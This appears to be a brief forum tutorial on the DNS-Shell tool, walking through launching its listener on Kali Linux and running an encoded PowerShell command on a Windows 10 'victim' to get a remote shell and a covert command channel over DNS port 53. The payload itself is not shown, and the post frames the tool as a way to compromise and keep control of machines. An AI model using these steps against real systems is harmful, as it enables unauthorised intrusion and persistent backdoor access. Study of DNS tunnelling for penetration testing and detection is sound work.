DNS Shell | Tool to Compromise and Maintain control Over Victim Machine 🚪

image

https://github.com/sensepost/DNS-Shell

DNS protocol runs on the application layer of TCP/IP Model . When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination server acts as the backdoor.

DNS Shell Tool is python based exploitation tool to compromise and also maintaining the access via command and control to the server.

Here we have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

ATTACKER MACHINE

  • Download the DNS SHELL tool from Github
  • Execute the command: python DNS-SHELL.py

It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)

Generating Payload – DNS Shell

Recursive Command – Python DNS-Shell.py -l -r

Direct command – Python DNS-Shell.py -l -d

Victims Machine

  • Run & Execute the Command with CMD : Powershell.exe -e

BACK TO ATTACKERS MACHINE

  • Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.

  • Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.
9 Likes